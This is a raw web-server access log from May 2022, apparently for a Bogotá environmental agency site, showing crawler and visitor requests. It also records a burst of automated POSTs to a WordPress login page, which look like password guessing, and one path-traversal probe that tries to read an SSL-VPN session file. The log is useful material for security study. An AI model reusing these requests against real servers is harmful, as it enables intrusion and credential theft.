2.56.57.132 - - [27/May/2022:05:18:56 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:56 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:56 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:57 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:57 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:57 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:58 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:58 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:59 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:59 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:18:59 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:00 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:00 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:01 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:01 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:01 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:02 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:02 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:02 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:03 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:03 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:04 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:04 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:04 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:05 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:05 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:05 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:06 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:06 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:06 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:07 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:07 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:08 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:08 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:08 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:09 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:09 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:09 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:10 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:10 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:11 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:11 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:11 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:12 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:12 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:12 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:13 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
2.56.57.132 - - [27/May/2022:05:19:13 -0500] "POST /portaldeninos//wp-login.php HTTP/1.1" 200 3588
207.46.13.179 - - [27/May/2022:05:20:03 -0500] "GET /bla/resoluciones/resoluciones%202012/0578.pdf HTTP/1.1" 200 365881
172.22.2.4 - - [27/May/2022:05:20:59 -0500] "GET /BLA/boletinlegal/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 1018
207.46.13.146 - - [27/May/2022:05:21:46 -0500] "GET /bla/resoluciones/resoluciones%202012/1375.pdf HTTP/1.1" 200 709873
216.245.221.92 - - [27/May/2022:05:21:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/May/2022:05:21:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44103
172.22.2.4 - - [27/May/2022:05:21:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.28.72.232 - - [27/May/2022:05:23:22 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
201.245.192.253 - - [27/May/2022:05:22:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44092
186.28.72.232 - - [27/May/2022:05:23:31 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2014%2F HTTP/1.1" 200 333168
172.22.2.4 - - [27/May/2022:05:22:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [27/May/2022:05:26:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:05:27:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:05:27:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56364
157.55.39.8 - - [27/May/2022:05:29:49 -0500] "GET /bla/resoluciones/resoluciones%202012/1283.pdf HTTP/1.1" 200 943626
216.245.221.92 - - [27/May/2022:05:31:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/May/2022:05:31:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44103
157.55.39.8 - - [27/May/2022:05:33:09 -0500] "GET /bla/resoluciones/resoluciones%202012/0628.pdf HTTP/1.1" 200 947296
201.245.192.253 - - [27/May/2022:05:32:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44092
172.22.2.4 - - [27/May/2022:05:32:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
51.75.241.40 - - [27/May/2022:05:35:04 -0500] "GET /BLA/boletinlegal/Directivas/2012/Directiva%20No.%201%20del%2030%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 1522771
172.22.2.4 - - [27/May/2022:05:33:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
181.50.216.121 - - [27/May/2022:05:36:51 -0500] "GET /cerrados-los-caminos-de-los-cerros-orientales-por-jornada-electoral.html HTTP/1.1" 200 809
216.245.221.92 - - [27/May/2022:05:36:57 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.77 - - [27/May/2022:05:38:23 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/Humedal-octubre-6-1024x512.jpg HTTP/1.1" 200 110569
45.8.165.70 - - [27/May/2022:05:39:27 -0500] "-" 408 -
172.22.2.4 - - [27/May/2022:05:38:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:05:39:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57520
157.55.39.15 - - [27/May/2022:05:41:55 -0500] "GET /bla/resoluciones/resoluciones%202012/0939.pdf HTTP/1.1" 200 410240
216.245.221.92 - - [27/May/2022:05:41:57 -0500] "HEAD / HTTP/1.1" 200 -
186.29.183.167 - - [27/May/2022:05:42:18 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 200 734
201.245.192.253 - - [27/May/2022:05:41:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44103
201.245.192.253 - - [27/May/2022:05:42:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44092
172.22.2.4 - - [27/May/2022:05:44:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:05:46:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [27/May/2022:05:46:57 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.134 - - [27/May/2022:05:46:57 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/Pieza-reciclaje-ambiente-17-mayo-1200x480.jpg HTTP/1.1" 200 75231
172.22.2.4 - - [27/May/2022:05:45:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56364
186.102.4.96 - - [27/May/2022:05:48:01 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+zj2nCLfdClq8oG+EyJOezWdLD26UDT7hcnz4Rsuk1VicQRSckk1yj&y=U2FsdGVkX189Xc7OzkjqOhGs02xyGbMbN4cisGPhES3JSXMIpoh7B9EaezWWYBfj HTTP/1.1" 200 30
186.102.4.96 - - [27/May/2022:05:48:02 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19Mx/bkYIlu6aINyNDULJGhbIVuwJ+x2nIpAeDtOrfMt6RVwldSJ6CuGUkNi37FbJiYgb/PFvwXIWwSMvEJcO9LOv9vigFU2uU=&u=U2FsdGVkX195YeblY9gUu949ZPQxbVxyLvBExiEWI6Y=&y=U2FsdGVkX189Xc7OzkjqOhGs02xyGbMbN4cisGPhES3JSXMIpoh7B9EaezWWYBfj HTTP/1.1" 200 97
186.102.4.96 - - [27/May/2022:05:48:02 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/1l0yp+ZckpJaNaCvqtl7m1cj+AOw0ng6StPzlLvR8kshbJDKho0C7iwPguyIaKUpilIzqPQYDzGjG5GLFewByv5oZR14TE55Gcf4PLXJrqYo+S7QZFkQU4v+gTdbF/CxZw/w/AWGBEyhcJ07/bWCsyTpWFDiUMx/q8yxnBPOgf4YMPqwuyFLylSX77QOLan1fmPpO3w9t5ym3HZ8yq7hXRcX8NFGwDxthmHpOcmMMjnnVnVJIdhu4UxCKH5QMyOXMZTtOq4Mx2F3m306b6O4kmw0mEX2UJOXpWWFM24qY+1scj/HKY2e5ZSe/RykxwwXy+Fvtqvge5KkjTiChEzvKYQpeLgp3nDK+3qiyPWGXxXb03qjsFCcV5qBny748xW62uiW/104DD5AWoS4NX0XwZdPY2BquFmouXyIo4xnI3qICh0PPqdUUaLyBemOnO8jfuWjvBQhqwIMQn4VcWDBSw7JLYcwtAj0m0q1qx2JhMcFyPhUvA+NDmnB46bfzX7pa69GlTSveMGUF/pSFuvADteeiWApKZ2tuucDULhgpV4+mjQZo5p90FP14xhSV0FnYVZp1ciI4R48lU1l0HdmonlWh6x/R+HyjgR1l+Tt5deYB7frCOIT2pf1oJQZujFBjvUdEtRbBTEIE7IUqHmdRP3jdKPdWYWum8/efgP5JVfSBNYLE0SN6nFkv9v/YMO0Ec0V16ohd82qtE4ERgfyhX6UTZzHDfxL2oTvHHbT5lCC1/tOg/wguyCtk+0M8R6i5sSzLEXBiWURKvNmpabXCwJs6iW+TD7MiuM2OUaA32ByykHmbOLNCu1Lp14xSb5EO7ciQ81ardkXKiFQtI5V1fETgMWUXT2v1La3Rb80chRIJq0di9m0EyzcBDK/fuk37JXKCXcd6QiF8xPdigKlKnptRjtrsxqLOyrAAF1ST2ancWSagp0pdCmi/ujxISrPIxYlRw+TE3vi4PXdZCpIQLygeiGPgnGqJuxJBUGcncAfVGUR25uKMCW6spDyobtEIw+O6hG3HUWq8bNELV89YY+x8YD1PyhTnKHF90zDv0sOzrFnvb0K2KvsQEAX5jLJMqKwDKazQETm8LaX+XbttzLlh18HneUqNxjRwiAoO24CPWdTpgU9ktU4w6lI/yocbyHVDCGyfIXeV6Sr/LDPKp7HCEK0HKzJ/sFdBHqQY+bxvZCS4sdvfTlLVF/97NABvKe3SAVct/j/9FVkjl581lDIfVU0FrrbCMG4NaS+txZfoyfw4oTSo37HpLggDaZ/UK3b1BY1hERUh3QNWcpeh6hzN09zrBDJnwjtrsMraY8kIOmQcWrAlGiQzxPajR+njh5RtvfbIuJRVYvy0G69woAIW7Ei5rPE=&u=U2FsdGVkX195YeblY9gUu949ZPQxbVxyLvBExiEWI6Y=&y=U2FsdGVkX189Xc7OzkjqOhGs02xyGbMbN4cisGPhES3JSXMIpoh7B9EaezWWYBfj HTTP/1.1" 200 958
186.102.4.96 - - [27/May/2022:05:48:02 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX182sJixxcBd3C12ToS6xBBPJuetV3GPUCT6q7kZqgZMJkQOtZEH+3bexyfq+T0YKY5ldmPQTCmp6U37yqSlwRZ8+CxK5+c36AQSZNyBX3tyiE0Sy4T32C/L3rXHnpFI56MaRehrs/hpeVK5GbUnocPg0DAESbMCUnCzFaLpL0j6T+tp0/7/2bgcqYZ/DbKeCFIFSyaOp51iUApwNQWbWYYqw8OT0i6Jvu1qvR8azj93NeaQtNSWrIzsQ212cZUNBYsNAaLaakAHoYdtoBNSgdvugW/MoxF9MR0=&u=U2FsdGVkX195YeblY9gUu949ZPQxbVxyLvBExiEWI6Y=&y=U2FsdGVkX189Xc7OzkjqOhGs02xyGbMbN4cisGPhES3JSXMIpoh7B9EaezWWYBfj HTTP/1.1" 200 176
186.102.4.96 - - [27/May/2022:05:48:02 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+zj2nCLfdClq8oG+EyJOezWdLD26UDT7hcnz4Rsuk1VicQRSckk1yj HTTP/1.1" 200 30992
172.22.2.4 - - [27/May/2022:05:48:45 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%204%20del%2006%20de%20Junio%20de%202014.pdf HTTP/1.1" 304 -
207.46.13.179 - - [27/May/2022:05:48:56 -0500] "GET /bla/resoluciones/resoluciones%202012/1144.pdf HTTP/1.1" 200 1053549
191.95.62.101 - - [27/May/2022:05:50:03 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 304 -
157.55.39.8 - - [27/May/2022:05:50:30 -0500] "GET /bla/resoluciones/resoluciones%202012/1143.pdf HTTP/1.1" 200 854536
216.245.221.92 - - [27/May/2022:05:51:57 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.127 - - [27/May/2022:05:52:05 -0500] "GET /bla/resoluciones/resoluciones%202012/0173.pdf HTTP/1.1" 200 188701
172.22.2.4 - - [27/May/2022:05:50:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:05:51:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.15 - - [27/May/2022:05:54:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0472.pdf HTTP/1.1" 304 -
207.46.13.179 - - [27/May/2022:05:55:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 324776
207.46.13.179 - - [27/May/2022:05:55:28 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 629573
157.55.39.8 - - [27/May/2022:05:55:51 -0500] "GET /bla/resoluciones/autos%202008/1300.pdf HTTP/1.1" 200 280906
173.252.107.117 - - [27/May/2022:05:56:37 -0500] "GET /primer-festival-de-la-papa-nativa-en-el-jardin-botanico-conozca-pruebe-y-disfrute-estos-manjares-criollos-y-saludables.html HTTP/1.1" 206 1116
216.245.221.92 - - [27/May/2022:05:56:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:05:57:25 -0500] "GET /BLA/boletinlegal/conceptos.php/js/ajax_conceptos.js HTTP/1.1" 200 7443
207.46.13.146 - - [27/May/2022:05:57:30 -0500] "GET /bla/resoluciones/resoluciones%202012/1555.pdf HTTP/1.1" 200 3303513
172.22.2.4 - - [27/May/2022:05:56:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:05:57:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.43 - - [27/May/2022:05:58:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%20351-400/00000358.tif HTTP/1.1" 200 250606
173.252.111.5 - - [27/May/2022:06:01:22 -0500] "GET /images/visita-suspension-humedal-techo-24-mayo.jpg HTTP/1.1" 200 57365
216.245.221.92 - - [27/May/2022:06:01:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:02:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.96.227.180 - - [27/May/2022:06:04:21 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
172.22.2.4 - - [27/May/2022:06:02:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
191.156.225.23 - - [27/May/2022:06:05:03 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 304 -
66.249.65.17 - - [27/May/2022:06:05:15 -0500] "-" 408 -
216.245.221.92 - - [27/May/2022:06:06:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:07:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:08:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57520
157.55.39.43 - - [27/May/2022:06:10:31 -0500] "GET /bla/resoluciones/resoluciones%202012/1336.pdf HTTP/1.1" 200 395251
216.245.221.92 - - [27/May/2022:06:11:57 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [27/May/2022:06:12:08 -0500] "GET /bla/resoluciones/resoluciones%202012/1722.pdf HTTP/1.1" 200 1079775
173.252.127.2 - - [27/May/2022:06:13:43 -0500] "GET /images/energia-eficiencia-26-mayo.jpg HTTP/1.1" 200 46417
172.22.2.4 - - [27/May/2022:06:13:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60175
172.22.2.4 - - [27/May/2022:06:14:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [27/May/2022:06:14:58 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [27/May/2022:06:15:01 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [27/May/2022:06:15:04 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [27/May/2022:06:15:07 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [27/May/2022:06:13:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
94.102.61.10 - - [27/May/2022:06:15:57 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [27/May/2022:06:14:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53024
191.109.189.212 - - [27/May/2022:06:16:29 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 200 734
172.22.2.4 - - [27/May/2022:06:16:38 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%204%20del%2005%20de%20junio%20de%202013.pdf HTTP/1.1" 200 130461
157.55.39.8 - - [27/May/2022:06:16:54 -0500] "GET /bla/resoluciones/resoluciones%202012/0290.pdf HTTP/1.1" 200 192943
216.245.221.92 - - [27/May/2022:06:16:56 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.15 - - [27/May/2022:06:18:22 -0500] "GET /bla/resoluciones/resoluciones%201998/RESOLUCION%201042%20DE%201998.pdf HTTP/1.1" 200 143521
157.55.39.43 - - [27/May/2022:06:18:41 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
157.55.39.8 - - [27/May/2022:06:18:52 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
157.55.39.8 - - [27/May/2022:06:18:55 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
207.46.13.179 - - [27/May/2022:06:18:57 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
207.46.13.179 - - [27/May/2022:06:19:00 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
207.46.13.146 - - [27/May/2022:06:19:01 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
207.46.13.179 - - [27/May/2022:06:19:03 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
173.252.95.4 - - [27/May/2022:06:19:12 -0500] "GET /images/jornadas-llantas-usadas-23-mayo.jpg HTTP/1.1" 200 148376
69.171.231.2 - - [27/May/2022:06:19:29 -0500] "GET /images/la-vieja-mayo-24.jpg HTTP/1.1" 200 58217
157.55.39.43 - - [27/May/2022:06:20:53 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
157.55.39.43 - - [27/May/2022:06:21:03 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
157.55.39.43 - - [27/May/2022:06:21:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1054.pdf HTTP/1.1" 200 487632
172.22.2.4 - - [27/May/2022:06:19:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.8 - - [27/May/2022:06:21:22 -0500] "GET /bla/resoluciones/resoluciones%201998/RESOLUCION%20121%20DE%201998.pdf HTTP/1.1" 200 50298
172.22.2.4 - - [27/May/2022:06:21:32 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 304 -
216.245.221.92 - - [27/May/2022:06:21:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:20:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53024
201.245.192.253 - - [27/May/2022:06:21:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44144
201.245.192.253 - - [27/May/2022:06:22:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44113
173.252.107.118 - - [27/May/2022:06:23:34 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 206 734
173.252.107.6 - - [27/May/2022:06:23:34 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
173.252.107.1 - - [27/May/2022:06:23:38 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 206 734
157.55.39.8 - - [27/May/2022:06:24:22 -0500] "GET /BLA/resoluciones/00000379.tif HTTP/1.1" 404 1018
216.245.221.92 - - [27/May/2022:06:26:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:25:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.120 - - [27/May/2022:06:27:25 -0500] "GET /proyecto-de-eficiencia-energetica-y-energia-solar-para-entidades-publicas-de-bogota-recibira-apoyo-de-c40.html HTTP/1.1" 206 890
173.252.107.118 - - [27/May/2022:06:27:26 -0500] "GET /proyecto-de-eficiencia-energetica-y-energia-solar-para-entidades-publicas-de-bogota-recibira-apoyo-de-c40.html HTTP/1.1" 206 890
147.75.122.242 - - [27/May/2022:06:27:28 -0500] "GET /proyecto-de-eficiencia-energetica-y-energia-solar-para-entidades-publicas-de-bogota-recibira-apoyo-de-c40.html?fbclid=IwAR3m9jj4hLDxgrASsvlM8loXXLGdHen_nsbyLmntRfGACNVjuFCBWT3PMTQ HTTP/1.1" 200 890
172.22.2.4 - - [27/May/2022:06:27:35 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 304 -
172.22.2.4 - - [27/May/2022:06:26:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.8 - - [27/May/2022:06:29:24 -0500] "GET /bla/resoluciones/resoluciones%202012/0433.pdf HTTP/1.1" 200 430320
147.75.122.242 - - [27/May/2022:06:29:57 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html?fbclid=IwAR3xLtktDXsKplxJTUoUWo9TqUJ0jcIi_ub9CvfNiLc0-AZefiTUqnM1ZJs HTTP/1.1" 200 734
184.105.139.69 - - [27/May/2022:06:30:56 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [27/May/2022:06:31:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/May/2022:06:31:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44144
172.22.2.4 - - [27/May/2022:06:31:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/May/2022:06:32:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44113
172.22.2.4 - - [27/May/2022:06:32:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59075
186.102.86.195 - - [27/May/2022:06:34:29 -0500] "GET /medida-preventiva-por-afectacion-al-humedal-de-techo.html HTTP/1.1" 200 779
40.77.190.142 - - [27/May/2022:06:34:51 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
179.33.75.211 - - [27/May/2022:06:35:19 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 200 734
35.204.142.40 - - [27/May/2022:06:35:35 -0500] "GET / HTTP/1.1" 200 319
66.249.65.15 - - [27/May/2022:06:35:35 -0500] "-" 408 -
207.46.13.179 - - [27/May/2022:06:36:50 -0500] "GET /bla/resoluciones/resoluciones%202012/1468.pdf HTTP/1.1" 304 -
216.245.221.92 - - [27/May/2022:06:36:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:37:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:37:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
186.102.15.74 - - [27/May/2022:06:40:35 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18dS95XHI6yztsZtWYF1Rw/LbW7xa7I+kVJwpcdeypltwsExcjfrDU4&y=U2FsdGVkX19Hvt9mux5QEQHkKM5vHR5IEo1ficOuCIufiQ0yKwdu0MrJvhSuMRdt HTTP/1.1" 200 30
186.102.15.74 - - [27/May/2022:06:40:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+0lP9T9xU9pvWIaMspSM9pRiWormdT1nDEZMKvFE4h6si7XkuGMm+V3D/rZMjWBjj/rc+M3y4Y5Jln9pk2eyOtyLhXZy2e9Zo=&u=U2FsdGVkX18lM4CTr+bnLjXDXa/I7N/h+JxRV5gIros=&y=U2FsdGVkX19Hvt9mux5QEQHkKM5vHR5IEo1ficOuCIufiQ0yKwdu0MrJvhSuMRdt HTTP/1.1" 200 97
